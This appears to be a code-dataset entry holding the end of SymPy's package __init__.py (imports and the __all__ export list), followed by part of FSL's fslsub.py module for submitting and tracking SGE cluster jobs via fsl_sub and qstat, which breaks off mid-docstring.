from .sets import (Set, Interval, Union, EmptySet, FiniteSet, ProductSet,
Intersection, DisjointUnion, imageset, Complement, SymmetricDifference, ImageSet,
Range, ComplexRegion, Reals, Contains, ConditionSet, Ordinal,
OmegaPower, ord0, PowerSet, Naturals, Naturals0, UniversalSet,
Integers, Rationals)
from .solvers import (solve, solve_linear_system, solve_linear_system_LU,
solve_undetermined_coeffs, nsolve, solve_linear, checksol, det_quick,
inv_quick, check_assumptions, failing_assumptions, diophantine,
rsolve, rsolve_poly, rsolve_ratio, rsolve_hyper, checkodesol,
classify_ode, dsolve, homogeneous_order, solve_poly_system,
solve_triangulated, pde_separate, pde_separate_add, pde_separate_mul,
pdsolve, classify_pde, checkpdesol, ode_order, reduce_inequalities,
reduce_abs_inequality, reduce_abs_inequalities, solve_poly_inequality,
solve_rational_inequalities, solve_univariate_inequality, decompogen,
solveset, linsolve, linear_eq_to_matrix, nonlinsolve, substitution,
Complexes)
from .matrices import (ShapeError, NonSquareMatrixError, GramSchmidt,
casoratian, diag, eye, hessian, jordan_cell, list2numpy, matrix2numpy,
matrix_multiply_elementwise, ones, randMatrix, rot_axis1, rot_axis2,
rot_axis3, symarray, wronskian, zeros, MutableDenseMatrix,
DeferredVector, MatrixBase, Matrix, MutableMatrix,
MutableSparseMatrix, banded, ImmutableDenseMatrix,
ImmutableSparseMatrix, ImmutableMatrix, SparseMatrix, MatrixSlice,
BlockDiagMatrix, BlockMatrix, FunctionMatrix, Identity, Inverse,
MatAdd, MatMul, MatPow, MatrixExpr, MatrixSymbol, Trace, Transpose,
ZeroMatrix, OneMatrix, blockcut, block_collapse, matrix_symbols,
Adjoint, hadamard_product, HadamardProduct, HadamardPower,
Determinant, det, diagonalize_vector, DiagMatrix, DiagonalMatrix,
DiagonalOf, trace, DotProduct, kronecker_product, KroneckerProduct,
PermutationMatrix, MatrixPermute, Permanent, per)
from .geometry import (Point, Point2D, Point3D, Line, Ray, Segment, Line2D,
Segment2D, Ray2D, Line3D, Segment3D, Ray3D, Plane, Ellipse, Circle,
Polygon, RegularPolygon, Triangle, rad, deg, are_similar, centroid,
convex_hull, idiff, intersection, closest_points, farthest_points,
GeometryError, Curve, Parabola)
from .utilities import (flatten, group, take, subsets, variations,
numbered_symbols, cartes, capture, dict_merge, postorder_traversal,
interactive_traversal, prefixes, postfixes, sift, topological_sort,
unflatten, has_dups, has_variety, reshape, default_sort_key, ordered,
rotations, filldedent, lambdify, source, threaded, xthreaded, public,
memoize_property, timed)
from .integrals import (integrate, Integral, line_integrate, mellin_transform,
inverse_mellin_transform, MellinTransform, InverseMellinTransform,
laplace_transform, inverse_laplace_transform, LaplaceTransform,
InverseLaplaceTransform, fourier_transform, inverse_fourier_transform,
FourierTransform, InverseFourierTransform, sine_transform,
inverse_sine_transform, SineTransform, InverseSineTransform,
cosine_transform, inverse_cosine_transform, CosineTransform,
InverseCosineTransform, hankel_transform, inverse_hankel_transform,
HankelTransform, InverseHankelTransform, singularityintegrate)
from .tensor import (IndexedBase, Idx, Indexed, get_contraction_structure,
get_indices, shape, MutableDenseNDimArray, ImmutableDenseNDimArray,
MutableSparseNDimArray, ImmutableSparseNDimArray, NDimArray,
tensorproduct, tensorcontraction, tensordiagonal, derive_by_array,
permutedims, Array, DenseNDimArray, SparseNDimArray)
from .parsing import parse_expr
from .calculus import (euler_equations, singularities, is_increasing,
is_strictly_increasing, is_decreasing, is_strictly_decreasing,
is_monotonic, finite_diff_weights, apply_finite_diff, as_finite_diff,
differentiate_finite, periodicity, not_empty_in, AccumBounds,
is_convex, stationary_points, minimum, maximum)
from .algebras import Quaternion
from .printing import (pager_print, pretty, pretty_print, pprint,
pprint_use_unicode, pprint_try_use_unicode, latex, print_latex,
multiline_latex, mathml, print_mathml, python, print_python, pycode,
ccode, print_ccode, glsl_code, print_glsl, cxxcode, fcode,
print_fcode, rcode, print_rcode, jscode, print_jscode, julia_code,
mathematica_code, octave_code, rust_code, print_gtk, preview, srepr,
print_tree, StrPrinter, sstr, sstrrepr, TableForm, dotprint,
maple_code, print_maple_code)
from .testing import test, doctest
# This module causes conflicts with other modules:
# from .stats import *
# Adds about .04-.05 seconds of import time
# from combinatorics import *
# This module is slow to import:
#from physics import units
from .plotting import plot, textplot, plot_backends, plot_implicit, plot_parametric
from .interactive import init_session, init_printing
evalf._create_evalf_table()
__all__ = [
# sympy.core
'sympify', 'SympifyError', 'cacheit', 'Basic', 'Atom',
'preorder_traversal', 'S', 'Expr', 'AtomicExpr', 'UnevaluatedExpr',
'Symbol', 'Wild', 'Dummy', 'symbols', 'var', 'Number', 'Float',
'Rational', 'Integer', 'NumberSymbol', 'RealNumber', 'igcd', 'ilcm',
'seterr', 'E', 'I', 'nan', 'oo', 'pi', 'zoo', 'AlgebraicNumber', 'comp',
'mod_inverse', 'Pow', 'integer_nthroot', 'integer_log', 'Mul', 'prod',
'Add', 'Mod', 'Rel', 'Eq', 'Ne', 'Lt', 'Le', 'Gt', 'Ge', 'Equality',
'GreaterThan', 'LessThan', 'Unequality', 'StrictGreaterThan',
'StrictLessThan', 'vectorize', 'Lambda', 'WildFunction', 'Derivative',
'diff', 'FunctionClass', 'Function', 'Subs', 'expand', 'PoleError',
'count_ops', 'expand_mul', 'expand_log', 'expand_func', 'expand_trig',
'expand_complex', 'expand_multinomial', 'nfloat', 'expand_power_base',
'expand_power_exp', 'arity', 'PrecisionExhausted', 'N', 'evalf', 'Tuple',
'Dict', 'gcd_terms', 'factor_terms', 'factor_nc', 'evaluate', 'Catalan',
'EulerGamma', 'GoldenRatio', 'TribonacciConstant',
# sympy.logic
'to_cnf', 'to_dnf', 'to_nnf', 'And', 'Or', 'Not', 'Xor', 'Nand', 'Nor',
'Implies', 'Equivalent', 'ITE', 'POSform', 'SOPform', 'simplify_logic',
'bool_map', 'true', 'false', 'satisfiable',
# sympy.assumptions
'AppliedPredicate', 'Predicate', 'AssumptionsContext', 'assuming', 'Q',
'ask', 'register_handler', 'remove_handler', 'refine',
# sympy.polys
'Poly', 'PurePoly', 'poly_from_expr', 'parallel_poly_from_expr', 'degree',
'total_degree', 'degree_list', 'LC', 'LM', 'LT', 'pdiv', 'prem', 'pquo',
'pexquo', 'div', 'rem', 'quo', 'exquo', 'half_gcdex', 'gcdex', 'invert',
'subresultants', 'resultant', 'discriminant', 'cofactors', 'gcd_list',
'gcd', 'lcm_list', 'lcm', 'terms_gcd', 'trunc', 'monic', 'content',
'primitive', 'compose', 'decompose', 'sturm', 'gff_list', 'gff',
'sqf_norm', 'sqf_part', 'sqf_list', 'sqf', 'factor_list', 'factor',
'intervals', 'refine_root', 'count_roots', 'real_roots', 'nroots',
'ground_roots', 'nth_power_roots_poly', 'cancel', 'reduced', 'groebner',
'is_zero_dimensional', 'GroebnerBasis', 'poly', 'symmetrize', 'horner',
'interpolate', 'rational_interpolate', 'viete', 'together',
'BasePolynomialError', 'ExactQuotientFailed', 'PolynomialDivisionFailed',
'OperationNotSupported', 'HeuristicGCDFailed', 'HomomorphismFailed',
'IsomorphismFailed', 'ExtraneousFactors', 'EvaluationFailed',
'RefinementFailed', 'CoercionFailed', 'NotInvertible', 'NotReversible',
'NotAlgebraic', 'DomainError', 'PolynomialError', 'UnificationFailed',
'GeneratorsError', 'GeneratorsNeeded', 'ComputationFailed',
'UnivariatePolynomialError', 'MultivariatePolynomialError',
'PolificationFailed', 'OptionError', 'FlagError', 'minpoly',
'minimal_polynomial', 'primitive_element', 'field_isomorphism',
'to_number_field', 'isolate', 'itermonomials', 'Monomial', 'lex', 'grlex',
'grevlex', 'ilex', 'igrlex', 'igrevlex', 'CRootOf', 'rootof', 'RootOf',
'ComplexRootOf', 'RootSum', 'roots', 'Domain', 'FiniteField',
'IntegerRing', 'RationalField', 'RealField', 'ComplexField',
'PythonFiniteField', 'GMPYFiniteField', 'PythonIntegerRing',
'GMPYIntegerRing', 'PythonRational', 'GMPYRationalField',
'AlgebraicField', 'PolynomialRing', 'FractionField', 'ExpressionDomain',
'FF_python', 'FF_gmpy', 'ZZ_python', 'ZZ_gmpy', 'QQ_python', 'QQ_gmpy',
'GF', 'FF', 'ZZ', 'QQ', 'ZZ_I', 'QQ_I', 'RR', 'CC', 'EX', 'EXRAW',
'construct_domain', 'swinnerton_dyer_poly', 'cyclotomic_poly',
'symmetric_poly', 'random_poly', 'interpolating_poly', 'jacobi_poly',
'chebyshevt_poly', 'chebyshevu_poly', 'hermite_poly', 'legendre_poly',
'laguerre_poly', 'apart', 'apart_list', 'assemble_partfrac_list',
'Options', 'ring', 'xring', 'vring', 'sring', 'field', 'xfield', 'vfield',
'sfield',
# sympy.series
'Order', 'O', 'limit', 'Limit', 'gruntz', 'series', 'approximants',
'residue', 'EmptySequence', 'SeqPer', 'SeqFormula', 'sequence', 'SeqAdd',
'SeqMul', 'fourier_series', 'fps', 'difference_delta', 'limit_seq',
# sympy.functions
'factorial', 'factorial2', 'rf', 'ff', 'binomial', 'RisingFactorial',
'FallingFactorial', 'subfactorial', 'carmichael', 'fibonacci', 'lucas',
'motzkin', 'tribonacci', 'harmonic', 'bernoulli', 'bell', 'euler', 'catalan',
'genocchi', 'partition', 'sqrt', 'root', 'Min', 'Max', 'Id', 'real_root',
'cbrt', 're', 'im', 'sign', 'Abs', 'conjugate', 'arg', 'polar_lift',
'periodic_argument', 'unbranched_argument', 'principal_branch',
'transpose', 'adjoint', 'polarify', 'unpolarify', 'sin', 'cos', 'tan',
'sec', 'csc', 'cot', 'sinc', 'asin', 'acos', 'atan', 'asec', 'acsc',
'acot', 'atan2', 'exp_polar', 'exp', 'ln', 'log', 'LambertW', 'sinh',
'cosh', 'tanh', 'coth', 'sech', 'csch', 'asinh', 'acosh', 'atanh',
'acoth', 'asech', 'acsch', 'floor', 'ceiling', 'frac', 'Piecewise',
'piecewise_fold', 'erf', 'erfc', 'erfi', 'erf2', 'erfinv', 'erfcinv',
'erf2inv', 'Ei', 'expint', 'E1', 'li', 'Li', 'Si', 'Ci', 'Shi', 'Chi',
'fresnels', 'fresnelc', 'gamma', 'lowergamma', 'uppergamma', 'polygamma',
'loggamma', 'digamma', 'trigamma', 'multigamma', 'dirichlet_eta', 'zeta',
'lerchphi', 'polylog', 'stieltjes', 'Eijk', 'LeviCivita',
'KroneckerDelta', 'SingularityFunction', 'DiracDelta', 'Heaviside',
'bspline_basis', 'bspline_basis_set', 'interpolating_spline', 'besselj',
'bessely', 'besseli', 'besselk', 'hankel1', 'hankel2', 'jn', 'yn',
'jn_zeros', 'hn1', 'hn2', 'airyai', 'airybi', 'airyaiprime',
'airybiprime', 'marcumq', 'hyper', 'meijerg', 'appellf1', 'legendre',
'assoc_legendre', 'hermite', 'chebyshevt', 'chebyshevu',
'chebyshevu_root', 'chebyshevt_root', 'laguerre', 'assoc_laguerre',
'gegenbauer', 'jacobi', 'jacobi_normalized', 'Ynm', 'Ynm_c', 'Znm',
'elliptic_k', 'elliptic_f', 'elliptic_e', 'elliptic_pi', 'beta',
'mathieus', 'mathieuc', 'mathieusprime', 'mathieucprime', 'riemann_xi','betainc',
'betainc_regularized',
# sympy.ntheory
'nextprime', 'prevprime', 'prime', 'primepi', 'primerange', 'randprime',
'Sieve', 'sieve', 'primorial', 'cycle_length', 'composite', 'compositepi',
'isprime', 'divisors', 'proper_divisors', 'factorint', 'multiplicity',
'perfect_power', 'pollard_pm1', 'pollard_rho', 'primefactors', 'totient',
'trailing', 'divisor_count', 'proper_divisor_count', 'divisor_sigma',
'factorrat', 'reduced_totient', 'primenu', 'primeomega',
'mersenne_prime_exponent', 'is_perfect', 'is_mersenne_prime',
'is_abundant', 'is_deficient', 'is_amicable', 'abundance', 'npartitions',
'is_primitive_root', 'is_quad_residue', 'legendre_symbol',
'jacobi_symbol', 'n_order', 'sqrt_mod', 'quadratic_residues',
'primitive_root', 'nthroot_mod', 'is_nthpow_residue', 'sqrt_mod_iter',
'mobius', 'discrete_log', 'quadratic_congruence', 'binomial_coefficients',
'binomial_coefficients_list', 'multinomial_coefficients',
'continued_fraction_periodic', 'continued_fraction_iterator',
'continued_fraction_reduce', 'continued_fraction_convergents',
'continued_fraction', 'egyptian_fraction',
# sympy.concrete
'product', 'Product', 'summation', 'Sum',
# sympy.discrete
'fft', 'ifft', 'ntt', 'intt', 'fwht', 'ifwht', 'mobius_transform',
'inverse_mobius_transform', 'convolution', 'covering_product',
'intersecting_product',
# sympy.simplify
'simplify', 'hypersimp', 'hypersimilar', 'logcombine', 'separatevars',
'posify', 'besselsimp', 'kroneckersimp', 'signsimp', 'bottom_up',
'nsimplify', 'FU', 'fu', 'sqrtdenest', 'cse', 'use', 'epath', 'EPath',
'hyperexpand', 'collect', 'rcollect', 'radsimp', 'collect_const',
'fraction', 'numer', 'denom', 'trigsimp', 'exptrigsimp', 'powsimp',
'powdenest', 'combsimp', 'gammasimp', 'ratsimp', 'ratsimpmodprime',
# sympy.sets
'Set', 'Interval', 'Union', 'EmptySet', 'FiniteSet', 'ProductSet',
'Intersection', 'imageset', 'DisjointUnion', 'Complement', 'SymmetricDifference',
'ImageSet', 'Range', 'ComplexRegion', 'Reals', 'Contains', 'ConditionSet',
'Ordinal', 'OmegaPower', 'ord0', 'PowerSet', 'Reals', 'Naturals',
'Naturals0', 'UniversalSet', 'Integers', 'Rationals',
# sympy.solvers
'solve', 'solve_linear_system', 'solve_linear_system_LU',
'solve_undetermined_coeffs', 'nsolve', 'solve_linear', 'checksol',
'det_quick', 'inv_quick', 'check_assumptions', 'failing_assumptions',
'diophantine', 'rsolve', 'rsolve_poly', 'rsolve_ratio', 'rsolve_hyper',
'checkodesol', 'classify_ode', 'dsolve', 'homogeneous_order',
'solve_poly_system', 'solve_triangulated', 'pde_separate',
'pde_separate_add', 'pde_separate_mul', 'pdsolve', 'classify_pde',
'checkpdesol', 'ode_order', 'reduce_inequalities',
'reduce_abs_inequality', 'reduce_abs_inequalities',
'solve_poly_inequality', 'solve_rational_inequalities',
'solve_univariate_inequality', 'decompogen', 'solveset', 'linsolve',
'linear_eq_to_matrix', 'nonlinsolve', 'substitution', 'Complexes',
# sympy.matrices
'ShapeError', 'NonSquareMatrixError', 'GramSchmidt', 'casoratian', 'diag',
'eye', 'hessian', 'jordan_cell', 'list2numpy', 'matrix2numpy',
'matrix_multiply_elementwise', 'ones', 'randMatrix', 'rot_axis1',
'rot_axis2', 'rot_axis3', 'symarray', 'wronskian', 'zeros',
'MutableDenseMatrix', 'DeferredVector', 'MatrixBase', 'Matrix',
'MutableMatrix', 'MutableSparseMatrix', 'banded', 'ImmutableDenseMatrix',
'ImmutableSparseMatrix', 'ImmutableMatrix', 'SparseMatrix', 'MatrixSlice',
'BlockDiagMatrix', 'BlockMatrix', 'FunctionMatrix', 'Identity', 'Inverse',
'MatAdd', 'MatMul', 'MatPow', 'MatrixExpr', 'MatrixSymbol', 'Trace',
'Transpose', 'ZeroMatrix', 'OneMatrix', 'blockcut', 'block_collapse',
'matrix_symbols', 'Adjoint', 'hadamard_product', 'HadamardProduct',
'HadamardPower', 'Determinant', 'det', 'diagonalize_vector', 'DiagMatrix',
'DiagonalMatrix', 'DiagonalOf', 'trace', 'DotProduct',
'kronecker_product', 'KroneckerProduct', 'PermutationMatrix',
'MatrixPermute', 'Permanent', 'per',
# sympy.geometry
'Point', 'Point2D', 'Point3D', 'Line', 'Ray', 'Segment', 'Line2D',
'Segment2D', 'Ray2D', 'Line3D', 'Segment3D', 'Ray3D', 'Plane', 'Ellipse',
'Circle', 'Polygon', 'RegularPolygon', 'Triangle', 'rad', 'deg',
'are_similar', 'centroid', 'convex_hull', 'idiff', 'intersection',
'closest_points', 'farthest_points', 'GeometryError', 'Curve', 'Parabola',
# sympy.utilities
'flatten', 'group', 'take', 'subsets', 'variations', 'numbered_symbols',
'cartes', 'capture', 'dict_merge', 'postorder_traversal',
'interactive_traversal', 'prefixes', 'postfixes', 'sift',
'topological_sort', 'unflatten', 'has_dups', 'has_variety', 'reshape',
'default_sort_key', 'ordered', 'rotations', 'filldedent', 'lambdify',
'source', 'threaded', 'xthreaded', 'public', 'memoize_property', 'test',
'doctest', 'timed',
# sympy.integrals
'integrate', 'Integral', 'line_integrate', 'mellin_transform',
'inverse_mellin_transform', 'MellinTransform', 'InverseMellinTransform',
'laplace_transform', 'inverse_laplace_transform', 'LaplaceTransform',
'InverseLaplaceTransform', 'fourier_transform',
'inverse_fourier_transform', 'FourierTransform',
'InverseFourierTransform', 'sine_transform', 'inverse_sine_transform',
'SineTransform', 'InverseSineTransform', 'cosine_transform',
'inverse_cosine_transform', 'CosineTransform', 'InverseCosineTransform',
'hankel_transform', 'inverse_hankel_transform', 'HankelTransform',
'InverseHankelTransform', 'singularityintegrate',
# sympy.tensor
'IndexedBase', 'Idx', 'Indexed', 'get_contraction_structure',
'get_indices', 'shape', 'MutableDenseNDimArray', 'ImmutableDenseNDimArray',
'MutableSparseNDimArray', 'ImmutableSparseNDimArray', 'NDimArray',
'tensorproduct', 'tensorcontraction', 'tensordiagonal', 'derive_by_array',
'permutedims', 'Array', 'DenseNDimArray', 'SparseNDimArray',
# sympy.parsing
'parse_expr',
# sympy.calculus
'euler_equations', 'singularities', 'is_increasing',
'is_strictly_increasing', 'is_decreasing', 'is_strictly_decreasing',
'is_monotonic', 'finite_diff_weights', 'apply_finite_diff',
'as_finite_diff', 'differentiate_finite', 'periodicity', 'not_empty_in',
'AccumBounds', 'is_convex', 'stationary_points', 'minimum', 'maximum',
# sympy.algebras
'Quaternion',
# sympy.printing
'pager_print', 'pretty', 'pretty_print', 'pprint', 'pprint_use_unicode',
'pprint_try_use_unicode', 'latex', 'print_latex', 'multiline_latex',
'mathml', 'print_mathml', 'python', 'print_python', 'pycode', 'ccode',
'print_ccode', 'glsl_code', 'print_glsl', 'cxxcode', 'fcode',
'print_fcode', 'rcode', 'print_rcode', 'jscode', 'print_jscode',
'julia_code', 'mathematica_code', 'octave_code', 'rust_code', 'print_gtk',
'preview', 'srepr', 'print_tree', 'StrPrinter', 'sstr', 'sstrrepr',
'TableForm', 'dotprint', 'maple_code', 'print_maple_code',
# sympy.plotting
'plot', 'textplot', 'plot_backends', 'plot_implicit', 'plot_parametric',
# sympy.interactive
'init_session', 'init_printing',
# sympy.testing
'test', 'doctest',
]
#===========================================================================#
# #
# XXX: The names below were importable before sympy 1.6 using #
# #
# from sympy import * #
# #
# This happened implicitly because there was no __all__ defined in this #
# __init__.py file. Not every package is imported. The list matches what #
# would have been imported before. It is possible that these packages will #
# not be imported by a star-import from sympy in future. #
# #
#===========================================================================#
__all__.extend((
'algebras',
'assumptions',
'calculus',
'concrete',
'discrete',
'external',
'functions',
'geometry',
'interactive',
'multipledispatch',
'ntheory',
'parsing',
'plotting',
'polys',
'printing',
'release',
'strategies',
'tensor',
'utilities',
))
| [] | [] | [
"SYMPY_DEBUG"
] | [] | ["SYMPY_DEBUG"] | python | 1 | 0 | |
fsl/utils/fslsub.py | #!/usr/bin/env python
#
# fslsub.py - Functions for using fsl_sub.
#
# Author: Michiel Cottaar <[email protected]>
#
"""This module submits jobs to a computing cluster using FSL's fsl_sub command
line tool. It is assumed that the computing cluster is managed by SGE.
Example usage, building a short pipeline::
from fsl.utils.fslsub import submit
# submits bet to veryshort queue unless <mask_filename> already exists
bet_job = submit('bet <input_filename> -m',
queue='veryshort.q',
output='<mask_filename>')
# submits another job
other_job = submit('some other pre-processing step', queue='short.q')
# submits cuda job, that should only start after both preparatory jobs are
# finished. This will work if bet_job and other_job are single job-ids
# (i.e., strings) or a sequence of multiple job-ids
cuda_job = submit('expensive job',
wait_for=(bet_job, other_job),
queue='cuda.q')
.. autosummary::
:nosignatures:
submit
info
output
func_to_cmd
hold
"""
from io import BytesIO
import os.path as op
import glob
import time
import pickle
import sys
import tempfile
import logging
import importlib
from dataclasses import dataclass, asdict
from typing import Optional, Collection, Union, Tuple, Dict
import argparse
import warnings
import os
import fsl.utils.deprecated as deprecated
log = logging.getLogger(__name__)
@dataclass
class SubmitParams(object):
"""Represents the fsl_sub parameters
The ``SubmitParams`` class is deprecated - you should use
:mod:`fsl.wrappers.fsl_sub` instead, or use the ``fsl_sub`` Python
library, which is installed as part of FSL.
Any command line script can be submitted by the parameters by calling the `SubmitParams` object:
.. code-block:: python
submit = SubmitParams(minutes=1, logdir='log', wait_for=['108023', '108019'])
submit('echo finished')
This will run "echo finished" with a maximum runtime of 1 minute after the jobs with IDs 108023 and 108019 are finished.
It is the equivalent of
.. code-block:: bash
fsl_sub -T 1 -l log -j 108023,108019 "echo finished"
For python scripts that submit themselves to the cluster, it might be useful to give the user some control
over at least some of the submission parameters. This can be done using:
.. code-block:: python
import argparse
parser = argparse.ArgumentParser("my script doing awesome stuff")
parser.add_argument("input_file")
parser.add_argument("output_file")
SubmitParams.add_to_parser(parser, include=('wait_for', 'logdir'))
args = parser.parse_args()
submitter = SubmitParams.from_args(args).update(minutes=10)
from fsl import wrappers
wrappers.bet(input_file, output_file, fslsub=submitter)
This submits a BET job using the -j and -l flags set by the user and a maximum time of 10 minutes.
"""
minutes: Optional[float] = None
queue: Optional[str] = None
architecture: Optional[str] = None
priority: Optional[int] = None
email: Optional[str] = None
wait_for: Union[str, None, Collection[str]] = None
job_name: Optional[str] = None
ram: Optional[int] = None
logdir: Optional[str] = None
mail_options: Optional[str] = None
flags: bool = False
multi_threaded: Optional[Tuple[str, str]] = None
verbose: bool = False
env: dict = None
cmd_line_flags = {
'-T': 'minutes',
'-q': 'queue',
'-a': 'architecture',
'-p': 'priority',
'-M': 'email',
'-N': 'job_name',
'-R': 'ram',
'-l': 'logdir',
'-m': 'mail_options',
}
def __post_init__(self):
"""
If not set explicitly by the user don't alter the environment in which the script will be submitted
"""
if self.env is None:
self.env = dict(os.environ)
def as_flags(self, ):
"""
Creates flags for submission using fsl_sub
All parameters changed from their default value (typically None) will be included in the flags.
:return: tuple with the flags
"""
res = []
for key, value in self.cmd_line_flags.items():
if getattr(self, value) is not None:
res.extend((key, str(getattr(self, value))))
if self.verbose:
res.append('-v')
if self.flags:
res.append('-F')
if self.multi_threaded:
res.extend(("-s", ','.join(self.multi_threaded)))
if self.wait_for is not None and len(_flatten_job_ids(self.wait_for)) > 0:
res.extend(('-j', _flatten_job_ids(self.wait_for)))
return tuple(res)
def __str__(self):
return 'SubmitParams({})'.format(" ".join(self.as_flags()))
@deprecated.deprecated('3.7.0', '4.0.0',
'Use fsl.wrappers.fsl_sub instead')
def __call__(self, *command, **kwargs):
"""
Submits the command to the cluster.
:param command: string or tuple of strings with the command to submit
:param kwargs: Keyword arguments can override any parameters set in self
:return: job ID
"""
from fsl.utils.run import prepareArgs, runfsl
runner = self.update(**kwargs)
command = prepareArgs(command)
fsl_sub_cmd = ' '.join(('fsl_sub', ) + tuple(runner.as_flags()) + tuple(command))
log.debug(fsl_sub_cmd)
jobid = runfsl(fsl_sub_cmd, env=runner.env).strip()
log.debug('Job submitted as {}'.format(jobid))
return jobid
def update(self, **kwargs):
"""
Creates a new SubmitParams withe updated parameters
"""
values = asdict(self)
values.update(kwargs)
return SubmitParams(**values)
@classmethod
def add_to_parser(cls, parser: argparse.ArgumentParser, as_group='fsl_sub commands',
include=('wait_for', 'logdir', 'email', 'mail_options')):
"""
Adds submission parameters to the parser
:param parser: parser that should understand submission commands
:param as_group: add as a new group
:param include: sequence of argument flags/names that should be added to the parser
(set to None to include everything)
:return: the group the arguments got added to
"""
from fsl.utils.run import runfsl, FSLNotPresent
try:
fsl_sub_run, _ = runfsl('fsl_sub', exitcode=True)
except (FileNotFoundError, FSLNotPresent):
warnings.warn('fsl_sub was not found')
return
doc_lines = fsl_sub_run.splitlines()
nspaces = 1
for line in doc_lines:
if len(line.strip()) > 0:
while line.startswith(' ' * nspaces):
nspaces += 1
nspaces -= 1
if as_group:
group = parser.add_argument_group(as_group)
else:
group = parser
def get_explanation(flag):
explanation = None
for line in doc_lines:
if explanation is not None and len(line.strip()) > 0 and line.strip()[0] != '-':
explanation.append(line[nspaces:].strip())
elif explanation is not None:
break
elif line.strip().startswith(flag):
explanation = [line[nspaces:].strip()]
if (explanation is None) or (len(explanation) == 0):
return 'documentation not found'
return ' '.join(explanation)
for flag, value in cls.cmd_line_flags.items():
if include is not None and value not in include and flag not in include:
continue
as_type = {'minutes': float, 'priority': int, 'ram': int, 'verbose': None}
action = 'store_true' if value == 'verbose' else 'store'
group.add_argument(flag, dest='_sub_' + value, help=get_explanation(flag), action=action,
metavar='<' + value + '>', type=as_type.get(value, str))
group.add_argument('-F', dest='_sub_flags', help=get_explanation('-F'), action='store_true')
group.add_argument('-v', dest='_sub_verbose', help=get_explanation('-v'), action='store_true')
group.add_argument('-s', dest='_sub_multi_threaded', help=get_explanation('-s'),
metavar='<pename>,<threads>')
group.add_argument('-j', dest='_sub_wait_for', help=get_explanation('-j'),
metavar='<jid>')
return group
@classmethod
def from_args(cls, args):
"""
Create a SubmitParams from the command line arguments
"""
as_dict = {value: getattr(args, '_sub_' + value, None) for value in cls.cmd_line_flags.values()}
if args._sub_wait_for is not None:
as_dict['wait_for'] = args._sub_wait_for.split(',')
if args._sub_multi_threaded is not None:
pename, threads = args._sub_multi_threaded.split(',')
as_dict['multi_threaded'] = pename, threads
return cls(verbose=args._sub_verbose, flags=args._sub_flags, **as_dict)
def submit(*command, **kwargs):
"""
Submits a given command to the cluster
The ``submit`` function is deprecated - you should use
:mod:`fsl.wrappers.fsl_sub` instead, or use the ``fsl_sub`` Python
library, which is available in FSL 6.0.5 and newer.
You can pass the command and arguments as a single string, or as a regular or unpacked sequence.
:arg command: string or regular/unpacked sequence of strings with the job command
:arg minutes: Estimated job length in minutes, used to auto-set
queue name
:arg queue: Explicitly sets the queue name
:arg architecture: e.g., darwin or lx24-amd64
:arg priority: Lower priority [0:-1024] default = 0
:arg email: Who to email after job completion
:arg wait_for: Place a hold on this task until the job-ids in this
string or tuple are complete
:arg job_name: Specify job name as it will appear on the queue
:arg ram: Max total RAM to use for job (integer in MB)
:arg logdir: where to output logfiles
:arg mail_options: Change the SGE mail options, see qsub for details
:arg output: If <output> image or file already exists, do nothing
and exit
:arg flags: If True, use flags embedded in scripts to set SGE
queuing options
:arg multi_threaded: Submit a multi-threaded task - Set to a tuple
containing two elements:
- <pename>: a PE configures for the requested queues
- <threads>: number of threads to run
:arg verbose: If True, use verbose mode
:arg env: Dict containing environment variables
:return: string of submitted job id
"""
return SubmitParams(**kwargs)(*command)
@deprecated.deprecated('3.7.0', '4.0.0', 'Use fsl_sub.report instead')
def info(job_ids) -> Dict[str, Optional[Dict[str, str]]]:
"""Gets information on a given job id
The ``info`` function is deprecated - you should use the
``fsl_sub.report`` function from the ``fsl_sub`` Python library, which
is available in FSL 6.0.5 and newer.
Uses `qstat -j <job_ids>`
:arg job_ids: string with job id or (nested) sequence with jobs
:return: dictionary of jobid -> another dictionary with job information
(or None if job does not exist)
"""
if not hasattr(info, '_ncall'):
info._ncall = 0
info._ncall += 1
if info._ncall == 3:
warnings.warn("Please do not call `fslsub.info` repeatably, because it slows down the cluster. You can avoid this message by simply passing all the job IDs you are interested in to a single `fslsub.info` call.")
from fsl.utils.run import run
job_ids_string = _flatten_job_ids(job_ids)
try:
result = run(['qstat', '-j', job_ids_string], exitcode=True)[0]
except FileNotFoundError:
log.debug("qstat not found; assuming not on cluster")
return {}
return _parse_qstat(job_ids_string, result)
def _parse_qstat(job_ids_string, qstat_stdout):
"""
Parses the qstat output into a dictionary of dictionaries
:param job_ids_string: input job ids
:param qstat_stdout: qstat output
:return: dictionary of jobid -> another dictionary with job information
(or None if job does not exist)
"""
res = {job_id: None for job_id in job_ids_string.split(',')}
current_job_id = None
for line in qstat_stdout.splitlines()[1:]:
line = line.strip()
if len(line) == 0:
continue
if line == '=' * len(line):
current_job_id = None
elif ':' in line:
current_key, value = [part.strip() for part in line.split(':', 1)]
if current_key == 'job_number':
current_job_id = value
if current_job_id not in job_ids_string:
raise ValueError(f"Unexpected job ID in qstat output:\n{line}")
res[current_job_id] = {}
else:
if current_job_id is None:
raise ValueError(f"Found job information before job ID in qstat output:\n{line}")
res[current_job_id][current_key] = value
else:
res[current_job_id][current_key] += '\n' + line
return res
def output(job_id, logdir='.', command=None, name=None):
"""Returns the output of the given job.
:arg job_id: String containing job ID.
:arg logdir: Directory containing the log - defaults to
the current directory.
:arg command: Command that was run. Not currently used.
:arg name: Job name if it was specified. Not currently used.
:returns: A tuple containing the standard output and standard error.
"""
stdout = list(glob.glob(op.join(logdir, '*.o{}'.format(job_id))))
stderr = list(glob.glob(op.join(logdir, '*.e{}'.format(job_id))))
if len(stdout) != 1 or len(stderr) != 1:
raise ValueError('No/too many error/output files for job {}: stdout: '
'{}, stderr: {}'.format(job_id, stdout, stderr))
stdout = stdout[0]
stderr = stderr[0]
if op.exists(stdout):
with open(stdout, 'rt') as f:
stdout = f.read()
else:
stdout = None
if op.exists(stderr):
with open(stderr, 'rt') as f:
stderr = f.read()
else:
stderr = None
return stdout, stderr
def _flatten_job_ids(job_ids):
"""
Returns a potentially nested sequence of job ids as a single comma-separated string
:param job_ids: possibly nested sequence of job ids. The job ids themselves should be strings.
:return: comma-separated string of job ids
"""
def unpack(job_ids):
"""Unpack the (nested) job-ids in a single set"""
if isinstance(job_ids, str):
return {job_ids}
elif isinstance(job_ids, int):
return {str(job_ids)}
else:
res = set()
for job_id in job_ids:
res.update(unpack(job_id))
return res
return ','.join(sorted(unpack(job_ids)))
def hold(job_ids, hold_filename=None):
"""
Waits until all jobs have finished
Internally works by submitting a new job, which creates a file named `hold_filename`,
which will only run after all jobs in `job_ids` finished.
This function will only return once `hold_filename` has been created
:param job_ids: possibly nested sequence of job ids. The job ids themselves should be strings.
